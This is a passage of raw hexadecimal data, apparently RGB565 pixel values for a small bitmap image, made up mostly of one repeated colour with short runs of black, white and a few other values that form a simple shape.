0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
